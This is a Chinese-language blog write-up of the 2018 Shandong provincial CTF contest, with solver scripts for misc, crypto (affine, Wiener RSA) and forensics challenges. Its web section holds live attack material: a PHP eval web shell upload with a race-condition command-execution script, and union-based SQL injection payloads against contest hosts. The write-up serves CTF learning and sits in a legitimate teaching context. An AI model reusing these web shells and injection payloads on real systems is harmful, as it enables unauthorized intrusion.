<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="2018-科来杯-第七届山东省网络安全技能大赛WP"><meta name="keywords" content=""><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>2018-科来杯-第七届山东省网络安全技能大赛WP | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Misc"><span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A5%9E%E7%A7%98%E7%9A%84%E6%96%87%E4%BB%B6"><span class="toc-text">神秘的文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ada"><span class="toc-text">ada</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#basic"><span class="toc-text">basic</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2"><span class="toc-text">进制转换</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CrackIt"><span class="toc-text">CrackIt</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#colors"><span class="toc-text">colors</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto"><span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#affine"><span class="toc-text">affine</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RSA"><span class="toc-text">RSA</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#forenisc"><span class="toc-text">forenisc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90"><span class="toc-text">日志分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E5%90%8E%E9%97%A8"><span class="toc-text">特殊后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#weblogic"><span class="toc-text">weblogic</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web1"><span class="toc-text">Web1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web2"><span class="toc-text">Web2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web3"><span class="toc-text">web3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%B6%E9%9B%86%E4%BF%A1%E6%81%AF"><span class="toc-text">收集信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E6%B5%8B%E8%AF%95"><span class="toc-text">注入测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flask-%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%B5%8B%E8%AF%95"><span class="toc-text">flask 模板注入测试</span></a></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">58</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">31</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">2018-科来杯-第七届山东省网络安全技能大赛WP</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-11-04</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF/">CTF</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.2k</span><span class="post-meta__separator">|</span><span>阅读时长: 9 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>参加一波2018科来杯的山东省赛，苟了个二等奖，<code>(￣▽￣)~*</code>。就是两个题因为工具没准备好，没做出来，有点可惜，<code>web3</code>有思路，但是差一点，学习了。</p>
<p>我分类就不分那么细了。</p>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="神秘的文件"><a href="#神秘的文件" class="headerlink" title="神秘的文件"></a>神秘的文件</h2><p>明文攻击</p>
<p>解压得到 <code>doc </code></p>
<p> 转成 <code>zip</code>，容易找到<code>flag</code></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/2018-11-04_00001.png"></p>
<h2 id="ada"><a href="#ada" class="headerlink" title="ada"></a>ada</h2><p><code>binwalk</code> 发现有压缩包</p>
<p><code>foremost</code>提取文件</p>
<p>zip  密码在属性里，这个点有点坑==、</p>
<p><code>hex  =&gt; str</code></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541296881916.png"></p>
<h2 id="basic"><a href="#basic" class="headerlink" title="basic"></a>basic</h2><p>打开文件，发现是三维数组，很明显是rgb，脚本画个图。</p>
<p>吐槽一下，135000个元素（非素数非平方==、）， 这个长宽，我来回换了好多次==、</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#-*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">x =  <span class="number">45</span><span class="comment">#x坐标  通过对txt里的行数进行整数分解</span></span><br><span class="line">y =  <span class="number">1800</span><span class="comment">#y坐标  x*y = 行数</span></span><br><span class="line"></span><br><span class="line">im = Image.new(<span class="string">&quot;RGB&quot;</span>,(x,y))<span class="comment">#创建图片</span></span><br><span class="line">file = open(<span class="string">&#x27;basic.txt&#x27;</span>) <span class="comment">#打开rbg值文件</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#通过一个个rgb点生成图片</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,x):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,y):</span><br><span class="line">        line = file.readline()<span class="comment">#获取一行</span></span><br><span class="line">        line = line[<span class="number">1</span>:<span class="number">-2</span>]</span><br><span class="line">        rgb = line.split(<span class="string">&quot;,&quot;</span>)<span class="comment">#分离rgb</span></span><br><span class="line">        im.putpixel((i,j),(int(rgb[<span class="number">0</span>]),int(rgb[<span class="number">1</span>]),int(rgb[<span class="number">2</span>])))<span class="comment">#rgb转化为像素</span></span><br><span class="line">im.save(<span class="string">&#x27;res.png&#x27;</span>)</span><br><span class="line">im.show()</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/res.png"></p>
<h2 id="进制转换"><a href="#进制转换" class="headerlink" title="进制转换"></a>进制转换</h2><p>easy</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="comment"># 进制转换</span></span><br><span class="line"><span class="comment"># __author__: V0W</span></span><br><span class="line"><span class="keyword">with</span> open(<span class="string">&#x27;text.txt&#x27;</span>,<span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">	content = f.read().split()</span><br><span class="line"><span class="comment">#print content </span></span><br><span class="line">res = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> content:</span><br><span class="line">	<span class="keyword">if</span> <span class="string">&#x27;x&#x27;</span> <span class="keyword">in</span> i:</span><br><span class="line">		intval = int(<span class="string">&#x27;0&#x27;</span>+i,<span class="number">16</span>)</span><br><span class="line">	<span class="keyword">elif</span> <span class="string">&#x27;b&#x27;</span> <span class="keyword">in</span> i:</span><br><span class="line">		intval = int(<span class="string">&#x27;0&#x27;</span>+i,<span class="number">2</span>)</span><br><span class="line">	<span class="keyword">elif</span> <span class="string">&#x27;o&#x27;</span> <span class="keyword">in</span> i:</span><br><span class="line">		intval = int(<span class="string">&#x27;0&#x27;</span>+i,<span class="number">8</span>)</span><br><span class="line">	<span class="keyword">elif</span> <span class="string">&#x27;d&#x27;</span> <span class="keyword">in</span> i:</span><br><span class="line">		intval = int(i.replace(<span class="string">&#x27;d&#x27;</span>,<span class="string">&#x27;&#x27;</span>))</span><br><span class="line">	res += chr(intval)</span><br><span class="line"><span class="keyword">print</span> res</span><br><span class="line"><span class="keyword">with</span> open(<span class="string">&#x27;Diversity.txt&#x27;</span>,<span class="string">&#x27;a&#x27;</span>) <span class="keyword">as</span> r:</span><br><span class="line">	r.write(<span class="string">&quot;\n\n\n\n\n&quot;</span>)</span><br><span class="line">	r.write(res)</span><br><span class="line">	r.close()</span><br></pre></td></tr></table></figure>



<h2 id="CrackIt"><a href="#CrackIt" class="headerlink" title="CrackIt"></a>CrackIt</h2><p>kali中有工具<code>john</code>(这次选择题还考到的)</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541343415008.png"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag&#123;hellokitty&#125;</span><br></pre></td></tr></table></figure>



<h2 id="colors"><a href="#colors" class="headerlink" title="colors"></a>colors</h2><p>直接把每张图片再<code>StegSlove</code>里面看看，在别的通道中，容易发现提示信息<code>MakeMeTall</code></p>
<p>联系png图片，就是说要改图片高度。</p>
<p>在<code>WinHex</code>里面改一下，这里最好是改成正方形即<code>400*400=0x0190</code></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541343717451.png">发现每张下面都有一部分<strong>黑点</strong>像素点，可以联系<code>01二进制</code></p>
<p>刚好7张照片，我们知道<code>ascii码</code>的可打印字符，是7位二进制。</p>
<p>下面就是写个小脚本，弄一下就完事了。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># __author__: V0W</span></span><br><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="comment"># env: python3</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># # 根据图像得到对应的01序列</span></span><br><span class="line"><span class="comment"># # 从上到下依次是0-6.png</span></span><br><span class="line"><span class="comment"># s=&#x27;&#x27;&#x27;11111111010111101111</span></span><br><span class="line"><span class="comment"># 11111011111110111111</span></span><br><span class="line"><span class="comment"># 00001100101010110001</span></span><br><span class="line"><span class="comment"># 01001010010000001101</span></span><br><span class="line"><span class="comment"># 11010011011101010111</span></span><br><span class="line"><span class="comment"># 10011011011010110110</span></span><br><span class="line"><span class="comment"># 00111001101101111101&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># ls = s.split(&#x27;\n&#x27;)</span></span><br><span class="line"><span class="comment"># # print(ls)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># # 将序列调整一下，竖着读，竖着读，竖着读！！！</span></span><br><span class="line"><span class="comment"># for j in range(0,20):</span></span><br><span class="line"><span class="comment"># 	for i in ls:</span></span><br><span class="line"><span class="comment"># 		print(i[j],end=&#x27;&#x27;)</span></span><br><span class="line"><span class="comment"># 	print(&#x27;\n&#x27;)</span></span><br><span class="line"></span><br><span class="line">num = [<span class="string">&#x27;1100110&#x27;</span>,<span class="string">&#x27;1101100&#x27;</span>,<span class="string">&#x27;1100001&#x27;</span>,<span class="string">&#x27;1100111&#x27;</span>,<span class="string">&#x27;1111011&#x27;</span>,<span class="string">&#x27;1010000&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;1101110&#x27;</span>,<span class="string">&#x27;1100111&#x27;</span>,<span class="string">&#x27;0110001&#x27;</span>,<span class="string">&#x27;1101110&#x27;</span>,<span class="string">&#x27;0110111&#x27;</span>,<span class="string">&#x27;1100101&#x27;</span>,<span class="string">&#x27;1110010&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;1000101&#x27;</span>,<span class="string">&#x27;1110011&#x27;</span>,<span class="string">&#x27;0110111&#x27;</span>,<span class="string">&#x27;1101001&#x27;</span>,<span class="string">&#x27;1101111&#x27;</span>,<span class="string">&#x27;1100110&#x27;</span>,<span class="string">&#x27;1111101&#x27;</span>]</span><br><span class="line"></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> n <span class="keyword">in</span> num:</span><br><span class="line">	flag += chr(int(str(n),<span class="number">2</span>))</span><br><span class="line"></span><br><span class="line">print(flag)</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;运行结果</span></span><br><span class="line"><span class="string">flag&#123;Png1n7erEs7iof&#125;</span></span><br><span class="line"><span class="string">[Finished in 0.5s]</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>



<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="affine"><a href="#affine" class="headerlink" title="affine"></a>affine</h2><p>仿射加密</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding:utf-8</span></span><br><span class="line"><span class="comment"># a,b为y=ax+b的系数</span></span><br><span class="line"><span class="comment"># y = 17*x-8 flag&#123;szzyfimhyzd&#125;   答案格式：flag&#123;********&#125;</span></span><br><span class="line"><span class="comment"># Crypto为密文，res为明文，暴力破解得到，不用求取逆元</span></span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line">crypto = <span class="string">&quot;szzyfimhyzd&quot;</span></span><br><span class="line">a = <span class="number">17</span></span><br><span class="line">b = <span class="number">-8</span></span><br><span class="line">word = string.ascii_lowercase</span><br><span class="line"><span class="comment"># print word</span></span><br><span class="line">res = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> crypto:</span><br><span class="line">	<span class="keyword">for</span> w <span class="keyword">in</span> word:</span><br><span class="line">		<span class="keyword">if</span> ord(c)<span class="number">-97</span> == ((ord(w)<span class="number">-97</span>)*a + b)%<span class="number">26</span>:</span><br><span class="line">			res += w</span><br><span class="line"><span class="keyword">print</span> res</span><br><span class="line"><span class="comment"># affineshift</span></span><br></pre></td></tr></table></figure>



<h2 id="RSA"><a href="#RSA" class="headerlink" title="RSA"></a>RSA</h2><p><em>比赛的时候没有安装好工具，很可惜（昨晚下了一半，就以为下好了，比赛才发现没有==、）</em></p>
<p>看到<code>e</code>特别大，容易想到<strong>高指数幂攻击</strong>或者说<strong>低解密指数攻击</strong></p>
<p>参考这篇<a target="_blank" rel="noopener" href="https://err0rzz.github.io/2017/11/14/CTF%E4%B8%ADRSA%E5%A5%97%E8%B7%AF/">大佬的文章</a></p>
<p>利用这个<a target="_blank" rel="noopener" href="https://github.com/pablocelayes/rsa-wiener-attack">rsa-wiener-attack</a></p>
<p>payload：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">hack_RSA</span>(<span class="params">e,n</span>):</span></span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    Finds d knowing (e,n)</span></span><br><span class="line"><span class="string">    applying the Wiener continued fraction attack</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span></span><br><span class="line">    frac = ContinuedFractions.rational_to_contfrac(e, n)</span><br><span class="line">    convergents = ContinuedFractions.convergents_from_contfrac(frac)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> (k,d) <span class="keyword">in</span> convergents:</span><br><span class="line">        </span><br><span class="line">        <span class="comment">#check if d is actually the key</span></span><br><span class="line">        <span class="keyword">if</span> k!=<span class="number">0</span> <span class="keyword">and</span> (e*d<span class="number">-1</span>)%k == <span class="number">0</span>:</span><br><span class="line">            phi = (e*d<span class="number">-1</span>)//k</span><br><span class="line">            s = n - phi + <span class="number">1</span></span><br><span class="line">            <span class="comment"># check if the equation x^2 - s*x + n = 0</span></span><br><span class="line">            <span class="comment"># has integer roots</span></span><br><span class="line">            discr = s*s - <span class="number">4</span>*n</span><br><span class="line">            <span class="keyword">if</span>(discr&gt;=<span class="number">0</span>):</span><br><span class="line">                t = Arithmetic.is_perfect_square(discr)</span><br><span class="line">                <span class="keyword">if</span> t!=<span class="number">-1</span> <span class="keyword">and</span> (s+t)%<span class="number">2</span>==<span class="number">0</span>:</span><br><span class="line">                    print(<span class="string">&quot;Hacked!&quot;</span>)</span><br><span class="line">                    <span class="keyword">return</span> d</span><br><span class="line"></span><br><span class="line">c = <span class="number">38230991316229399651823567590692301060044620412191737764632384680546256228451518238842965221394711848337832459443844446889468362154188214840736744657885858943810177675871991111466653158257191139605699916347308294995664530280816850482740530602254559123759121106338359220242637775919026933563326069449424391192</span></span><br><span class="line">e = <span class="number">354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619</span></span><br><span class="line">n = <span class="number">460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597</span></span><br><span class="line"></span><br><span class="line">d=hack_RSA(e,n)</span><br><span class="line">m=pow(c,d,n)</span><br><span class="line"><span class="keyword">print</span> <span class="string">&#x27;&#123;:x&#125;&#x27;</span>.format(m).decode(<span class="string">&#x27;hex&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541342936904.png"></p>
<h1 id="forenisc"><a href="#forenisc" class="headerlink" title="forenisc"></a>forenisc</h1><h2 id="日志分析"><a href="#日志分析" class="headerlink" title="日志分析"></a>日志分析</h2><p>我没什么好办法，手撕的==、</p>
<p>一个技巧是：利用sublime多行编辑（<code>Ctrl+shift+L</code>）删除多余的信息</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541341109590.png"></p>
<p>最后，得到的<code>flag</code>的<code>ascii码</code></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">102 108 97 103 123 115 113 108 109 52 112 95 49 53 95 112 48 119 101 114 102 117 108 125</span><br></pre></td></tr></table></figure>

<p>小jio本写一下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">s = <span class="string">&#x27;102 108 97 103 123 115 113 108 109 52 112 95 49 53 95 112 48 119 101 114 102 117 108 125&#x27;</span></span><br><span class="line">ls = s.split(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line"><span class="comment"># print ls</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> ls:</span><br><span class="line">	flag += chr(int(i))</span><br><span class="line"><span class="keyword">print</span> flag</span><br></pre></td></tr></table></figure>



<h2 id="特殊后门"><a href="#特殊后门" class="headerlink" title="特殊后门"></a>特殊后门</h2><p>提示说特殊的协议，发现icmp中有东西 : )    </p>
<p>后面，每个小的数据包都有一个字节的数据，最后合起来就是flag（吐槽一下，<code>infomation</code>的拼法）</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541311067204.png"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag&#123;Icmp_backdoor_can_transfer-some_infomation&#125;</span><br></pre></td></tr></table></figure>



<h2 id="weblogic"><a href="#weblogic" class="headerlink" title="weblogic"></a>weblogic</h2><p>搜索hostname，</p>
<p>追踪一个流，再次搜索<code>hostname</code></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541342204840.png"></p>
<p>提示hostname是十六进制，容易看到。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541311604922.png"></p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="Web1"><a href="#Web1" class="headerlink" title="Web1"></a>Web1</h2><p><code>XFF+cookie</code></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541299516409.png"></p>
<h2 id="Web2"><a href="#Web2" class="headerlink" title="Web2"></a>Web2</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">include</span> <span class="string">&#x27;here.php&#x27;</span>;</span><br><span class="line">    $key = <span class="string">&#x27;kelaibei&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;id&#x27;</span>]))&#123;</span><br><span class="line">        $id = $_GET[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">        @parse_str($id);</span><br><span class="line">        <span class="keyword">if</span> ($key[<span class="number">99</span>] != <span class="string">&#x27;aabg7XSs&#x27;</span> &amp;&amp; md5($key[<span class="number">99</span>]) == md5(<span class="string">&#x27;aabg7XSs&#x27;</span>)) &#123;</span><br><span class="line">           <span class="keyword">echo</span> $hint;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;try again&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><code>@parse_str($id);</code>解析变量</p>
<p>php弱类型+变量覆盖</p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.100.243:2002&#x2F;?id&#x3D;key[99]&#x3D;QNKCDZO</span><br></pre></td></tr></table></figure>

<p>得到链接  <a target="_blank" rel="noopener" href="http://192.168.100.243:2002/upl04d50m3thing.php">http://192.168.100.243:2002/upl04d50m3thing.php</a></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541304002941.png"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Filename：  qqq.php</span><br><span class="line">Content：  &lt;?php eval($_POST[&quot;v&quot;]);</span><br><span class="line"></span><br><span class="line">返回</span><br><span class="line">uploads&#x2F;e6ce11ded480d904ea8c3b30b00a23ab9bb59119&#x2F;qqq.php</span><br><span class="line"></span><br><span class="line">访问得到返回</span><br><span class="line">Tooslow</span><br></pre></td></tr></table></figure>

<p>容易得到结论：</p>
<p>后台的处理大概是: <code>file_put_content</code>，然后<code>sleep(1)</code>，<code>echo &#39;TooSlow&#39;</code></p>
<p>可以用条件竞争（或类似）一个脚本在这跑，然后去写shell，会在<code>post filename和content</code>瞬间访问到，</p>
<p>据说访问到就会返回flag。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://192.168.100.243:2002/uploads/e6ce11ded480d904ea8c3b30b00a23ab9bb59119/v.php&#x27;</span></span><br><span class="line"></span><br><span class="line">postdata = &#123;<span class="string">&#x27;v&#x27;</span>: <span class="string">&quot;system(&#x27;ls&#x27;);&quot;</span>&#125;</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">	r = requests.post(url,data=postdata)</span><br><span class="line">	<span class="keyword">print</span> r.text</span><br></pre></td></tr></table></figure>



<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541304661897.png"></p>
<h2 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h2><p><em>11-5 表哥复现了一下环境，于是复现学习一下。好题，妙啊！！</em></p>
<h3 id="收集信息"><a href="#收集信息" class="headerlink" title="收集信息"></a>收集信息</h3><p>首先，收集一下信息：测试发现</p>
<p><strong>Add a Comment</strong></p>
<p><code>Username</code>和<code>Comment</code>都有长度限制，一旦超过长度限制，就会报错<code>Mysql Error.</code></p>
<p><strong>Search Comments</strong></p>
<p>没有长度限制，存在明显的注入点，有过滤，敏感词汇或者SQL语法错误都会报错<code>Mysql Error.</code></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541415880546.png"></p>
<h3 id="注入测试"><a href="#注入测试" class="headerlink" title="注入测试"></a>注入测试</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">union select 1,2,3 #</span><br></pre></td></tr></table></figure>

<p>容易得到回显字段和列数（3）</p>
<p><em>这里非常可惜，我比赛时，用hackbar传数据，结果# 没传过去，当时以为是过滤了union和select 在那疯狂绕过啊=====、fo了，<code>#</code> urlencode传输就可以了、、哎、真菜啊</em></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/1541417483806.png"></p>
<p>接下来是基本操作了，直接放payload 和 结果</p>
<p>数据库名</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2,database() %23</span><br><span class="line"></span><br><span class="line">ctf</span><br></pre></td></tr></table></figure>

<p>表名</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2, group_concat(table_name) from information_schema.tables where table_schema&#x3D;database() %23</span><br><span class="line"></span><br><span class="line">comment</span><br></pre></td></tr></table></figure>

<p>列名</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.105.148.65:29003&#x2F;?username&#x3D;&#39; union select 1,2, group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&#39;comment&#39; %23</span><br><span class="line"></span><br><span class="line">id,username,comment</span><br></pre></td></tr></table></figure>



<p>一看列名，我也感觉到好像没什么东西（没有一般SQL注入题目的flag列之类的）</p>
<p>但是，当我抱着试一试的心理使用这个payload时：</p>
